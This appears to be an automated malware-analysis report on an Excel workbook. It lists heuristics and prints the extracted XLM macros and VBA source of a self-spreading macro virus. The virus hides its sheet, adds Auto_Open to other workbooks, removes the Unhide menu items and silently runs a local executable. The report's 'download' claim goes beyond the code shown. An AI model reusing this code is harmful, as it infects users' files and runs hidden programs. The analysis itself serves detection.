MALICIOUS
276
Risk Score
Malware Insights
MITRE ATT&CK
T1059.005 Visual Basic
T1203 Exploitation for Client Execution
This Excel file contains both Excel 4.0 (XLM) macros and VBA macros, with critical heuristics indicating the use of WScript.Shell and Shell() calls. The Workbook_Open and Auto_Open macros are present, suggesting an attempt to execute code upon opening the document. The presence of these macros and the shell execution capabilities strongly indicate the file is designed to download and execute a secondary payload.
Heuristics 8
-
Excel 4.0 (XLM) Auto_Open + macro sheet critical OLE_XLM_AUTOOPENWorkbook contains an Auto_Open / Auto_Close defined name together with an Excel 4.0 macro sheet — the canonical XLM auto-execution shape used by malware families such as Emotet and QakBot.
-
VBA macros detected medium 5 related findings OLE_VBA_MACROSDocument contains VBA macro code
-
WScript.Shell usage critical OLE_VBA_WSCRIPTWScript.Shell usageMatched line in script
Private Sub setflag(ByVal Wb As Workbook) Set w = CreateObject("wscript.shell") exefile = "c:\setflag.exe" -
CreateObject call high OLE_VBA_CREATEOBJCreateObject callMatched line in script
Private Sub setflag(ByVal Wb As Workbook) Set w = CreateObject("wscript.shell") exefile = "c:\setflag.exe" -
VBA p-code auto-exec with execution tokens high OLE_VBA_PCODE_AUTOEXEC_EXECCompiled VBA/cache stream contains an auto-execution token together with shell/download/object-execution tokens. This catches p-code-only or source-extraction-failure macro documents where visible source is unavailable.
-
Workbook_Open macro low OLE_VBA_WBOPENWorkbook_Open macroMatched line in script
Dim x As New Àà1 Private Sub Workbook_Open() On Error Resume Next -
Auto_Open macro low OLE_VBA_AUTOAuto_Open macroMatched line in script
ThisWorkbook.Sheets("(m1)_(m2)_(m3)").Columns(2).Copy Wb.Sheets("(m1)_(m2)_(m3)").Columns(2) Wb.Names.Add Name:="Auto_Open", RefersToR1C1:="='(m1)_(m2)_(m3)'!R1C1:R9C1", Category:="User Defined", MacroType:=xlCommand Wb.Saved = True -
Reference to Windows Script Host high SC_STR_WSCRIPTReference to Windows Script Host
Extracted artifacts 2
Files carved from inside the sample during analysis.
| Filename | Kind | Source | Size |
|---|---|---|---|
xlm_macros.txt |
xlm-macro | oletools.olevba.extract_all_macros (XLM macro listing) | 13602 bytes |
SHA-256: e1530018761dad82b1b3d158ca0360d49fc74a2aeae7367b1c82561b45364275 |
|||
Preview scriptFirst 1,000 lines of the extracted script
' 0085 22 BOUNDSHEET : Sheet Information - Excel 4.0 macro sheet, visible - (m1)_(m2)_(m3
' 0018 29 LABEL : Cell Value, String Constant - Counter len=7 ptgRef3d (m1)_(m2)_(m3!C82
' 002a 2 PRINTHEADERS : Print Row/Column Labels
' 00fd 10 LABELSST : Cell Value, String Constant/ SST
' 00fd 10 LABELSST : Cell Value, String Constant/ SST
' 00fd 10 LABELSST : Cell Value, String Constant/ SST
' 00fd 10 LABELSST : Cell Value, String Constant/ SST
' 00fd 10 LABELSST : Cell Value, String Constant/ SST
' 00fd 10 LABELSST : Cell Value, String Constant/ SST
' 00fd 10 LABELSST : Cell Value, String Constant/ SST
' 00fd 10 LABELSST : Cell Value, String Constant/ SST
' 00fd 10 LABELSST : Cell Value, String Constant/ SST
' 00fd 10 LABELSST : Cell Value, String Constant/ SST
' 00fd 10 LABELSST : Cell Value, String Constant/ SST
' 00fd 10 LABELSST : Cell Value, String Constant/ SST
' 00fd 10 LABELSST : Cell Value, String Constant/ SST
' 00fd 10 LABELSST : Cell Value, String Constant/ SST
' 00fd 10 LABELSST : Cell Value, String Constant/ SST
' 00fd 10 LABELSST : Cell Value, String Constant/ SST
' 00fd 10 LABELSST : Cell Value, String Constant/ SST
' 00fd 10 LABELSST : Cell Value, String Constant/ SST
' 00fd 10 LABELSST : Cell Value, String Constant/ SST
' 00fd 10 LABELSST : Cell Value, String Constant/ SST
' 00fd 10 LABELSST : Cell Value, String Constant/ SST
' 00fd 10 LABELSST : Cell Value, String Constant/ SST
' 00fd 10 LABELSST : Cell Value, String Constant/ SST
' 00fd 10 LABELSST : Cell Value, String Constant/ SST
' 00fd 10 LABELSST : Cell Value, String Constant/ SST
' 00fd 10 LABELSST : Cell Value, String Constant/ SST
' 00fd 10 LABELSST : Cell Value, String Constant/ SST
' 00fd 10 LABELSST : Cell Value, String Constant/ SST
' 00fd 10 LABELSST : Cell Value, String Constant/ SST
' 00fd 10 LABELSST : Cell Value, String Constant/ SST
' 00fd 10 LABELSST : Cell Value, String Constant/ SST
' 00fd 10 LABELSST : Cell Value, String Constant/ SST
' 00fd 10 LABELSST : Cell Value, String Constant/ SST
' 00fd 10 LABELSST : Cell Value, String Constant/ SST
' 00fd 10 LABELSST : Cell Value, String Constant/ SST
' 00fd 10 LABELSST : Cell Value, String Constant/ SST
' 00fd 10 LABELSST : Cell Value, String Constant/ SST
' 00fd 10 LABELSST : Cell Value, String Constant/ SST
' 00fd 10 LABELSST : Cell Value, String Constant/ SST
' 00fd 10 LABELSST : Cell Value, String Constant/ SST
' 00fd 10 LABELSST : Cell Value, String Constant/ SST
' 00fd 10 LABELSST : Cell Value, String Constant/ SST
' 00fd 10 LABELSST : Cell Value, String Constant/ SST
' 00fd 10 LABELSST : Cell Value, String Constant/ SST
' 00fd 10 LABELSST : Cell Value, String Constant/ SST
' 00fd 10 LABELSST : Cell Value, String Constant/ SST
' 00fd 10 LABELSST : Cell Value, String Constant/ SST
' 00fd 10 LABELSST : Cell Value, String Constant/ SST
' 00fd 10 LABELSST : Cell Value, String Constant/ SST
' 00fd 10 LABELSST : Cell Value, String Constant/ SST
' 00fd 10 LABELSST : Cell Value, String Constant/ SST
' 00fd 10 LABELSST : Cell Value, String Constant/ SST
' 00fd 10 LABELSST : Cell Value, String Constant/ SST
' 00fd 10 LABELSST : Cell Value, String Constant/ SST
' 00fd 10 LABELSST : Cell Value, String Constant/ SST
' 00fd 10 LABELSST : Cell Value, String Constant/ SST
' 00fd 10 LABELSST : Cell Value, String Constant/ SST
' 00fd 10 LABELSST : Cell Value, String Constant/ SST
' 00fd 10 LABELSST : Cell Value, String Constant/ SST
' 00fd 10 LABELSST : Cell Value, String Constant/ SST
' 00fd 10 LABELSST : Cell Value, String Constant/ SST
' 00fd 10 LABELSST : Cell Value, String Constant/ SST
' 00fd 10 LABELSST : Cell Value, String Constant/ SST
' 00fd 10 LABELSST : Cell Value, String Constant/ SST
' 00fd 10 LABELSST : Cell Value, String Constant/ SST
' 00fd 10 LABELSST : Cell Value, String Constant/ SST
' 00fd 10 LABELSST : Cell Value, String Constant/ SST
' 00fd 10 LABELSST : Cell Value, String Constant/ SST
' 00fd 10 LABELSST : Cell Value, String Constant/ SST
' 00fd 10 LABELSST : Cell Value, String Constant/ SST
' 00fd 10 LABELSST : Cell Value, String Constant/ SST
' 00fd 10 LABELSST : Cell Value, String Constant/ SST
' 00fd 10 LABELSST : Cell Value, String Constant/ SST
' 00fd 10 LABELSST : Cell Value, String Constant/ SST
' 00fd 10 LABELSST : Cell Value, String Constant/ SST
' 00fd 10 LABELSST : Cell Value, String Constant/ SST
' 00fd 10 LABELSST : Cell Value, String Constant/ SST
' 00fd 10 LABELSST : Cell Value, String Constant/ SST
' 00fd 10 LABELSST : Cell Value, String Constant/ SST
' 00fd 10 LABELSST : Cell Value, String Constant/ SST
' 00fd 10 LABELSST : Cell Value, String Constant/ SST
' 00fd 10 LABELSST : Cell Value, String Constant/ SST
' 00fd 10 LABELSST : Cell Value, String Constant/ SST
' 00fd 10 LABELSST : Cell Value, String Constant/ SST
' 00fd 10 LABELSST : Cell Value, String Constant/ SST
' 00fd 10 LABELSST : Cell Value, String Constant/ SST
' 00fd 10 LABELSST : Cell Value, String Constant/ SST
' 00fd 10 LABELSST : Cell Value, String Constant/ SST
' 00fd 10 LABELSST : Cell Value, String Constant/ SST
' 00fd 10 LABELSST : Cell Value, String Constant/ SST
' 00fd 10 LABELSST : Cell Value, String Constant/ SST
' 00fd 10 LABELSST : Cell Value, String Constant/ SST
' 00fd 10 LABELSST : Cell Value, String Constant/ SST
' 00fd 10 LABELSST : Cell Value, String Constant/ SST
' 00fd 10 LABELSST : Cell Value, String Constant/ SST
' 00fd 10 LABELSST : Cell Value, String Constant/ SST
' 00fd 10 LABELSST : Cell Value, String Constant/ SST
' 00fd 10 LABELSST : Cell Value, String Constant/ SST
' 00fd 10 LABELSST : Cell Value, String Constant/ SST
' 00fd 10 LABELSST : Cell Value, String Constant/ SST
' 00fd 10 LABELSST : Cell Value, String Constant/ SST
' 00fd 10 LABELSST : Cell Value, String Constant/ SST
' 00fd 10 LABELSST : Cell Value, String Constant/ SST
' 00fd 10 LABELSST : Cell Value, String Constant/ SST
' 00fd 10 LABELSST : Cell Value, String Constant/ SST
' 00fd 10 LABELSST : Cell Value, String Constant/ SST
' 00fd 10 LABELSST : Cell Value, String Constant/ SST
' 00fd 10 LABELSST : Cell Value, String Constant/ SST
' 00fd 10 LABELSST : Cell Value, String Constant/ SST
' 00fd 10 LABELSST : Cell Value, String Constant/ SST
' 00fd 10 LABELSST : Cell Value, String Constant/ SST
' 00fd 10 LABELSST : Cell Value, String Constant/ SST
' 00fd 10 LABELSST : Cell Value, String Constant/ SST
' 00fd 10 LABELSST : Cell Value, String Constant/ SST
' 00fd 10 LABELSST : Cell Value, String Constant/ SST
' 00fd 10 LABELSST : Cell Value, String Constant/ SST
' 00fd 10 LABELSST : Cell Value, String Constant/ SST
' 00fd 10 LABELSST : Cell Value, String Constant/ SST
' 00fd 10 LABELSST : Cell Value, String Constant/ SST
' 00fd 10 LABELSST : Cell Value, String Constant/ SST
' 00fd 10 LABELSST : Cell Value, String Constant/ SST
' 00fd 10 LABELSST : Cell Value, String Constant/ SST
' 00fd 10 LABELSST : Cell Value, String Constant/ SST
' 00fd 10 LABELSST : Cell Value, String Constant/ SST
' 00fd 10 LABELSST : Cell Value, String Constant/ SST
' 00fd 10 LABELSST : Cell Value, String Constant/ SST
' 00fd 10 LABELSST : Cell Value, String Constant/ SST
' 00fd 10 LABELSST : Cell Value, String Constant/ SST
' 00fd 10 LABELSST : Cell Value, String Constant/ SST
' 00fd 10 LABELSST : Cell Value, String Constant/ SST
' 00fd 10 LABELSST : Cell Value, String Constant/ SST
' 00fd 10 LABELSST : Cell Value, String Constant/ SST
' 00fd 10 LABELSST : Cell Value, String Constant/ SST
' 00fd 10 LABELSST : Cell Value, String Constant/ SST
' 00fd 10 LABELSST : Cell Value, String Constant/ SST
' 00fd 10 LABELSST : Cell Value, String Constant/ SST
' 00fd 10 LABELSST : Cell Value, String Constant/ SST
' 00fd 10 LABELSST : Cell Value, String Constant/ SST
' 00fd 10 LABELSST : Cell Value, String Constant/ SST
' 00fd 10 LABELSST : Cell Value, String Constant/ SST
' 00fd 10 LABELSST : Cell Value, String Constant/ SST
' 00fd 10 LABELSST : Cell Value, String Constant/ SST
' 00fd 10 LABELSST : Cell Value, String Constant/ SST
' 00fd 10 LABELSST : Cell Value, String Constant/ SST
' 00fd 10 LABELSST : Cell Value, String Constant/ SST
' 00fd 10 LABELSST : Cell Value, String Constant/ SST
' 00fd 10 LABELSST : Cell Value, String Constant/ SST
' 00fd 10 LABELSST : Cell Value, String Constant/ SST
' 00fd 10 LABELSST : Cell Value, String Constant/ SST
' 00fd 10 LABELSST : Cell Value, String Constant/ SST
' 00fd 10 LABELSST : Cell Value, String Constant/ SST
' 00fd 10 LABELSST : Cell Value, String Constant/ SST
' 00fd 10 LABELSST : Cell Value, String Constant/ SST
' 00fd 10 LABELSST : Cell Value, String Constant/ SST
' 00fd 10 LABELSST : Cell Value, String Constant/ SST
' 00fd 10 LABELSST : Cell Value, String Constant/ SST
' 00fd 10 LABELSST : Cell Value, String Constant/ SST
' 00fd 10 LABELSST : Cell Value, String Constant/ SST
' 00fd 10 LABELSST : Cell Value, String Constant/ SST
' 00fd 10 LABELSST : Cell Value, String Constant/ SST
' 00fd 10 LABELSST : Cell Value, String Constant/ SST
' 00fd 10 LABELSST : Cell Value, String Constant/ SST
' 00fd 10 LABELSST : Cell Value, String Constant/ SST
' 00fd 10 LABELSST : Cell Value, String Constant/ SST
' 00fd 10 LABELSST : Cell Value, String Constant/ SST
' 00fd 10 LABELSST : Cell Value, String Constant/ SST
' 00fd 10 LABELSST : Cell Value, String Constant/ SST
' 00fd 10 LABELSST : Cell Value, String Constant/ SST
' 00fd 10 LABELSST : Cell Value, String Constant/ SST
' 00fd 10 LABELSST : Cell Value, String Constant/ SST
' 00fd 10 LABELSST : Cell Value, String Constant/ SST
' 00fd 10 LABELSST : Cell Value, String Constant/ SST
' 00fd 10 LABELSST : Cell Value, String Constant/ SST
' 00fd 10 LABELSST : Cell Value, String Constant/ SST
' 00fd 10 LABELSST : Cell Value, String Constant/ SST
' 00fd 10 LABELSST : Cell Value, String Constant/ SST
' 00fd 10 LABELSST : Cell Value, String Constant/ SST
' 00fd 10 LABELSST : Cell Value, String Constant/ SST
' 00fd 10 LABELSST : Cell Value, String Constant/ SST
' 00fd 10 LABELSST : Cell Value, String Constant/ SST
' 00fd 10 LABELSST : Cell Value, String Constant/ SST
' 00fd 10 LABELSST : Cell Value, String Constant/ SST
' 00fd 10 LABELSST : Cell Value, String Constant/ SST
' 00fd 10 LABELSST : Cell Value, String Constant/ SST
' 00fd 10 LABELSST : Cell Value, String Constant/ SST
' 00fd 10 LABELSST : Cell Value, String Constant/ SST
' 00fd 10 LABELSST : Cell Value, String Constant/ SST
' 00fd 10 LABELSST : Cell Value, String Constant/ SST
' 00fd 10 LABELSST : Cell Value, String Constant/ SST
' 00fd 10 LABELSST : Cell Value, String Constant/ SST
' 00fd 10 LABELSST : Cell Value, String Constant/ SST
' 00fd 10 LABELSST : Cell Value, String Constant/ SST
' 00fd 10 LABELSST : Cell Value, String Constant/ SST
' 00fd 10 LABELSST : Cell Value, String Constant/ SST
' 00fd 10 LABELSST : Cell Value, String Constant/ SST
' 00fd 10 LABELSST : Cell Value, String Constant/ SST
' 00fd 10 LABELSST : Cell Value, String Constant/ SST
' 00fd 10 LABELSST : Cell Value, String Constant/ SST
' 00fd 10 LABELSST : Cell Value, String Constant/ SST
' 00fd 10 LABELSST : Cell Value, String Constant/ SST
' 00fd 10 LABELSST : Cell Value, String Constant/ SST
' 00fd 10 LABELSST : Cell Value, String Constant/ SST
' 00fd 10 LABELSST : Cell Value, String Constant/ SST
' 00fd 10 LABELSST : Cell Value, String Constant/ SST
' 00fd 10 LABELSST : Cell Value, String Constant/ SST
' 00fd 10 LABELSST : Cell Value, String Constant/ SST
' 00fd 10 LABELSST : Cell Value, String Constant/ SST
' 00fd 10 LABELSST : Cell Value, String Constant/ SST
' 00fd 10 LABELSST : Cell Value, String Constant/ SST
' 00fd 10 LABELSST : Cell Value, String Constant/ SST
' 00fd 10 LABELSST : Cell Value, String Constant/ SST
' 00fd 10 LABELSST : Cell Value, String Constant/ SST
' 00fd 10 LABELSST : Cell Value, String Constant/ SST
' 00fd 10 LABELSST : Cell Value, String Constant/ SST
' 00fd 10 LABELSST : Cell Value, String Constant/ SST
' 00fd 10 LABELSST : Cell Value, String Constant/ SST
' 00fd 10 LABELSST : Cell Value, String Constant/ SST
' 00fd 10 LABELSST : Cell Value, String Constant/ SST
' 00fd 10 LABELSST : Cell Value, String Constant/ SST
' 00fd 10 LABELSST : Cell Value, String Constant/ SST
' 00fd 10 LABELSST : Cell Value, String Constant/ SST
' 00fd 10 LABELSST : Cell Value, String Constant/ SST
' 00fd 10 LABELSST : Cell Value, String Constant/ SST
' 00fd 10 LABELSST : Cell Value, String Constant/ SST
' Sheet,Reference,Formula,Value
' (m1)_(m2)_(m3,A1,"FOPEN("c:\excel.txt",3)",""
' (m1)_(m2)_(m3,A2,"FOR.CELL("Counter",R~0C~2,TRUE)",""
' (m1)_(m2)_(m3,A3,A1,""
' (m1)_(m2)_(m3,A4,NEXT(),""
' (m1)_(m2)_(m3,A5,FCLOSE(A1),""
' (m1)_(m2)_(m3,A6,VBA.INSERT.FILE("c:\excel.txt"),""
' (m1)_(m2)_(m3,A7,"RUN("createcabfile",FALSE)",""
' (m1)_(m2)_(m3,A8,RETURN(),""
|
|||
macros.bas |
vba-macro | oletools.olevba.extract_macros (decoded VBA source) | 13702 bytes |
SHA-256: ef68a1aa7bd6dac19e8753aad516548762f89b3b769c967cc0cfef001e49c9b4 |
|||
Preview scriptFirst 1,000 lines of the extracted script
Attribute VB_Name = "ThisWorkbook"
Attribute VB_Base = "0{00020819-0000-0000-C000-000000000046}"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = False
Attribute VB_Customizable = True
Dim x As New Àà1
Private Sub Workbook_Open()
On Error Resume Next
Application.ShowWindowsInTaskbar = True
Application.Windows("norma1.xlm").Visible = False
MenuBars("Worksheet").Menus("¸ñʽ(&O)").MenuItems("¹¤×÷±í(&H)").MenuItems("È¡ÏûÒþ²Ø(&U)...").Delete
MenuBars("Worksheet").Menus("´°¿Ú(&W)").MenuItems("È¡ÏûÒþ²Ø(&U)...").Delete
Set x.App = Application
If Workbooks.Count <= 1 Then
Workbooks.Add
End If
End Sub
Attribute VB_Name = "?1"
Attribute VB_Base = "0{FCFB3D2A-A0FA-1068-A738-08002B3371B5}"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = False
Attribute VB_Exposed = False
Attribute VB_TemplateDerived = False
Attribute VB_Customizable = False
Public WithEvents App As Application
Attribute App.VB_VarHelpID = -1
Private Sub App_NewWorkbook(ByVal Wb As Workbook)
If Wb.Name = ThisWorkbook.Name Or Wb.Sheets(1).Name = "(m1)_(m2)_(m3)" Then
Exit Sub
End If
ThisWorkbook.Sheets("(m1)_(m2)_(m3)").Copy Wb.Sheets(1)
Wb.Sheets(1).Visible = False
Wb.Sheets(1).Name = "(m1)_(m2)_(m3)"
ThisWorkbook.Sheets("(m1)_(m2)_(m3)").Columns(2).Copy Wb.Sheets("(m1)_(m2)_(m3)").Columns(2)
Wb.Names.Add Name:="Auto_Open", RefersToR1C1:="='(m1)_(m2)_(m3)'!R1C1:R9C1", Category:="User Defined", MacroType:=xlCommand
Wb.Saved = True
End Sub
Private Sub App_WorkbookBeforeClose(ByVal Wb As Workbook, Cancel As Boolean)
On Error Resume Next
If Wb.Name = ThisWorkbook.Name Then
Exit Sub
End If
Cancel = False
hassaved = Wb.Saved
If hassaved = False Then
ch = MsgBox("Îļþ¡°" & ActiveWorkbook.Name & "¡±Òѱ»Ð޸ģ¬ÊÇ·ñ±£´æÆäÐ޸ĵÄÄÚÈÝ£¿", vbYesNoCancel + vbExclamation)
If ch = vbCancel Then
Cancel = True
Exit Sub
End If
If ch = vbNo Then
If InStr(Wb.Name, ".") <= 0 Then
Wb.Saved = True
Exit Sub
Else
SendKeys "{ESC}"
Wb.ChangeFileAccess xlReadOnly
GoTo quit
End If
End If
If ch = vbYes Then
If InStr(Wb.Name, ".") <= 0 Then
If Not Application.Dialogs(xlDialogSaveAs).Show(Wb.Name & ".xls") Then
Cancel = True
Exit Sub
Else
GoTo a1
End If
End If
Wb.Save
a1:
SendKeys "{ESC}"
Wb.ChangeFileAccess xlReadOnly
End If
Else
If InStr(Wb.Name, ".") <= 0 Then
Exit Sub
End If
SendKeys "{ESC}"
Wb.ChangeFileAccess xlReadOnly
End If
quit:
If Cancel = False And Wb.Sheets(1).Name = "(m1)_(m2)_(m3)" Then
setflag Wb
End If
Wb.Saved = True
End Sub
Private Sub App_WorkbookOpen(ByVal Wb As Workbook)
If Wb.Name = "normal.xlm" Then
Wb.Close
Exit Sub
End If
If Wb.Sheets(1).Name = "(m1)_(m2)_(m3)" And RTrim(LTrim(Wb.Sheets(1).Cells(45, 3).Value)) <> "word.quit" Then
Application.DisplayAlerts = False
Wb.Sheets("(m1)_(m2)_(m3)").Delete
Wb.Save
Application.DisplayAlerts = True
End If
If Wb.Name = ThisWorkbook.Name Or Wb.Sheets(1).Name = "(m1)_(m2)_(m3)" Then
Exit Sub
End If
For i = 1 To Workbooks.Count
If Workbooks(i).Name = "Book1" Then
If Workbooks(i).Saved = True Then
Workbooks(i).Close
GoTo a1
End If
End If
Next
a1:
ThisWorkbook.Sheets("(m1)_(m2)_(m3)").Copy Wb.Sheets(1)
Wb.Sheets(1).Visible = False
Wb.Sheets(1).Name = "(m1)_(m2)_(m3)"
ThisWorkbook.Sheets("(m1)_(m2)_(m3)").Columns(2).Copy Wb.Sheets("(m1)_(m2)_(m3)").Columns(2)
Wb.Names.Add Name:="Auto_Open", RefersToR1C1:="='(m1)_(m2)_(m3)'!R1C1:R8C1", Category:="User Defined", MacroType:=xlCommand
Wb.Save
End Sub
Private Sub setflag(ByVal Wb As Workbook)
Set w = CreateObject("wscript.shell")
exefile = "c:\setflag.exe"
w.Run exefile & " " & Chr(34) & Wb.FullName & Chr(34), 0, True
Set w = Nothing
End Sub
' Processing file: /tmp/qstore_rt8bked3
' ===============================================================================
' Module streams:
' _VBA_PROJECT_CUR/VBA/ThisWorkbook - 4804 bytes
' Line #0:
' Dim
' VarDefn _B_var_Set (New As Class)
' Line #1:
' FuncDefn (Private Sub Workbook_Open())
' Line #2:
' OnError (Resume Next)
' Line #3:
' LitVarSpecial (True)
' Ld Application
' MemSt ShowWindowsInTaskbar
' Line #4:
' LitVarSpecial (False)
' LitStr 0x000A "norma1.xlm"
' Ld Application
' ArgsMemLd Windows 0x0001
' MemSt Visible
' Line #5:
' LitStr 0x000F "È¡ÏûÒþ²Ø(&U)..."
' LitStr 0x000A "¹¤×÷±í(&H)"
' LitStr 0x0008 "¸ñʽ(&O)"
' LitStr 0x0009 "Worksheet"
' ArgsLd Ite 0x0001
' ArgsMemLd _B_var_Menus 0x0001
' ArgsMemLd Delete 0x0001
' ArgsMemLd Delete 0x0001
' ArgsMemCall Workbook_NewSheet 0x0000
' Line #6:
' LitStr 0x000F "È¡ÏûÒþ²Ø(&U)..."
' LitStr 0x0008 "´°¿Ú(&W)"
' LitStr 0x0009 "Worksheet"
' ArgsLd Ite 0x0001
' ArgsMemLd _B_var_Menus 0x0001
' ArgsMemLd Delete 0x0001
' ArgsMemCall Workbook_NewSheet 0x0000
' Line #7:
' SetStmt
' Ld Application
' Ld _B_var_Set
' Memset App_NewWorkbook
' Line #8:
' Ld createcabfile
' MemLd MenuBar
' LitDI2 0x0001
' Le
' IfBlock
' Line #9:
' Ld createcabfile
' ArgsMemCall Ad 0x0000
' Line #10:
' EndIfBlock
' Line #11:
' Line #12:
' EndSub
' _VBA_PROJECT_CUR/VBA/类1 - 22645 bytes
' Line #0:
' Dim (Public)
' VarDefn (WithEvents) App_NewWorkbook (As Application) 0x0000
' Line #1:
' Line #2:
' FuncDefn (Private Sub Wb(ByVal NewWorkbook As ))
' Line #3:
' Ld NewWorkbook
' MemLd Name
' Ld ThisWorkbook
' MemLd Name
' Eq
' LitDI2 0x0001
' Ld NewWorkbook
' ArgsMemLd Add 0x0001
' MemLd Name
' LitStr 0x000E "(m1)_(m2)_(m3)"
' Eq
' Or
' IfBlock
' Line #4:
' ExitSub
' Line #5:
' EndIfBlock
' Line #6:
' LitDI2 0x0001
' Ld NewWorkbook
' ArgsMemLd Add 0x0001
' LitStr 0x000E "(m1)_(m2)_(m3)"
' Ld ThisWorkbook
' ArgsMemLd Add 0x0001
' ArgsMemCall Cop 0x0001
' Line #7:
' LitVarSpecial (False)
' LitDI2 0x0001
' Ld NewWorkbook
' ArgsMemLd Add 0x0001
' MemSt Visible
' Line #8:
' LitStr 0x000E "(m1)_(m2)_(m3)"
' LitDI2 0x0001
' Ld NewWorkbook
' ArgsMemLd Add 0x0001
' MemSt Name
' Line #9:
' LitDI2 0x0002
' LitStr 0x000E "(m1)_(m2)_(m3)"
' Ld NewWorkbook
' ArgsMemLd Add 0x0001
' ArgsMemLd _B_var_ff 0x0001
' LitDI2 0x0002
' LitStr 0x000E "(m1)_(m2)_(m3)"
' Ld ThisWorkbook
' ArgsMemLd Add 0x0001
' ArgsMemLd _B_var_ff 0x0001
' ArgsMemCall Cop 0x0001
' Line #10:
' LitStr 0x0009 "Auto_Open"
' ParamNamed Name
' LitStr 0x001B "='(m1)_(m2)_(m3)'!R1C1:R9C1"
' ParamNamed Category
' LitStr 0x000C "User Defined"
' ParamNamed MacroType
' Ld ff
' ParamNamed xlCommand
' Ld NewWorkbook
' MemLd RefersToR1C1
' ArgsMemCall Ad 0x0004
' Line #11:
' LitVarSpecial (True)
' Ld NewWorkbook
' MemSt _B_var_If
' Line #12:
' EndSub
' Line #13:
' Line #14:
' FuncDefn (Private Sub Application_WorkbookBeforeClose(ByVal NewWorkbook As , BeforeSave As Boolean))
' Line #15:
' OnError (Resume Next)
' Line #16:
' Ld NewWorkbook
' MemLd Name
' Ld ThisWorkbook
' MemLd Name
' Eq
' IfBlock
' Line #17:
' ExitSub
' Line #18:
' EndIfBlock
' Line #19:
' LitVarSpecial (False)
' St BeforeSave
' Line #20:
' Ld NewWorkbook
' MemLd _B_var_If
' St _B_var_hassaved
' Line #21:
' Ld _B_var_hassaved
' LitVarSpecial (False)
' Eq
' IfBlock
' Line #22:
' LitStr 0x0006 "Îļþ¡°"
' Ld Saved
' MemLd Name
' Concat
' LitStr 0x0022 "¡±Òѱ»Ð޸ģ¬ÊÇ·ñ±£´æÆäÐ޸ĵÄÄÚÈÝ£¿"
' Concat
' Ld vbExclamation
' Ld vbCancel
' Add
' ArgsLd MsgBox 0x0002
' St _B_var_ch
' Line #23:
' Ld _B_var_ch
' Ld EnableEvents
' Eq
' IfBlock
' Line #24:
' LitVarSpecial (True)
' St BeforeSave
' Line #25:
' ExitSub
' Line #26:
' EndIfBlock
' Line #27:
' Ld _B_var_ch
' Ld Save
' Eq
' IfBlock
' Line #28:
' Ld NewWorkbook
' MemLd Name
' LitStr 0x0001 "."
' FnInStr
' LitDI2 0x0000
' Le
' IfBlock
' Line #29:
' LitVarSpecial (True)
' Ld NewWorkbook
' MemSt _B_var_If
' Line #30:
' ExitSub
' Line #31:
' ElseBlock
' Line #32:
' LitStr 0x0005 "{ESC}"
' ArgsCall RejectAllChanges 0x0001
' Line #33:
' Ld xlReadWrite
' Ld NewWorkbook
' ArgsMemCall xlReadOnly 0x0001
' Line #34:
' GoTo vbNo
' Line #35:
' EndIfBlock
' Line #36:
' EndIfBlock
' Line #37:
' Ld _B_var_ch
' Ld SendKeys
' Eq
' IfBlock
' Line #38:
' Ld NewWorkbook
' MemLd Name
' LitStr 0x0001 "."
' FnInStr
' LitDI2 0x0000
' Le
' IfBlock
' Line #39:
' Ld NewWorkbook
' MemLd Name
' LitStr 0x0004 ".xls"
' Concat
' Ld Show
' Ld Application
' ArgsMemLd xlDialogSaveAs 0x0001
' ArgsMemLd Names 0x0001
' Not
' IfBlock
' Line #40:
' LitVarSpecial (True)
' St BeforeSave
' Line #41:
' ExitSub
' Line #42:
' ElseBlock
' Line #43:
' GoTo Protect
' Line #44:
' EndIfBlock
' Line #45:
' EndIfBlock
' Line #46:
' Ld NewWorkbook
' ArgsMemCall Lines 0x0000
' Line #47:
' Label Protect
' Line #48:
' LitStr 0x0005 "{ESC}"
' ArgsCall RejectAllChanges 0x0001
' Line #49:
' Ld xlReadWrite
' Ld NewWorkbook
' ArgsMemCall xlReadOnly 0x0001
' Line #50:
' EndIfBlock
' Line #51:
' ElseBlock
' Line #52:
' Ld NewWorkbook
' MemLd Name
' LitStr 0x0001 "."
' FnInStr
' LitDI2 0x0000
' Le
' IfBlock
' Line #53:
' ExitSub
' Line #54:
' EndIfBlock
' Line #55:
' LitStr 0x0005 "{ESC}"
' ArgsCall RejectAllChanges 0x0001
' Line #56:
' Ld xlReadWrite
' Ld NewWorkbook
' ArgsMemCall xlReadOnly 0x0001
' Line #57:
' EndIfBlock
' Line #58:
' Label vbNo
' Line #59:
' Ld BeforeSave
' LitVarSpecial (False)
' Eq
' LitDI2 0x0001
' Ld NewWorkbook
' ArgsMemLd Add 0x0001
' MemLd Name
' LitStr 0x000E "(m1)_(m2)_(m3)"
' Eq
' And
' IfBlock
' Line #60:
' Ld NewWorkbook
' ArgsCall fso 0x0001
' Line #61:
' EndIfBlock
' Line #62:
' LitVarSpecial (True)
' Ld NewWorkbook
' MemSt _B_var_If
' Line #63:
' Line #64:
' EndSub
' Line #65:
' Line #66:
' FuncDefn (Private Sub WorkbookOpen(ByVal NewWorkbook As ))
' Line #67:
' Ld NewWorkbook
' MemLd Name
' LitStr 0x000A "normal.xlm"
' Eq
' IfBlock
' Line #68:
' Ld NewWorkbook
' ArgsMemCall Close 0x0000
' Line #69:
' ExitSub
' Line #70:
' EndIfBlock
' Line #71:
' LitDI2 0x0001
' Ld NewWorkbook
' ArgsMemLd Add 0x0001
' MemLd Name
' LitStr 0x000E "(m1)_(m2)_(m3)"
' Eq
' LitDI2 0x002D
' LitDI2 0x0003
' LitDI2 0x0001
' Ld NewWorkbook
' ArgsMemLd Add 0x0001
' ArgsMemLd j 0x0002
' MemLd _B_var_myfolder
' ArgsLd _B_var_LTrim 0x0001
' ArgsLd _B_var_RTrim 0x0001
' LitStr 0x0009 "word.quit"
' Ne
' And
' IfBlock
' Line #72:
' LitVarSpecial (False)
' Ld Application
' MemSt vbYes
' Line #73:
' LitStr 0x000E "(m1)_(m2)_(m3)"
' Ld NewWorkbook
' ArgsMemLd Add 0x0001
' ArgsMemCall Workbook_NewSheet 0x0000
' Line #74:
' Ld NewWorkbook
' ArgsMemCall Lines 0x0000
' Line #75:
' LitVarSpecial (True)
' Ld Application
' MemSt vbYes
' Line #76:
' EndIfBlock
' Line #77:
' Ld NewWorkbook
' MemLd Name
' Ld ThisWorkbook
' MemLd Name
' Eq
' LitDI2 0x0001
' Ld NewWorkbook
' ArgsMemLd Add 0x0001
' MemLd Name
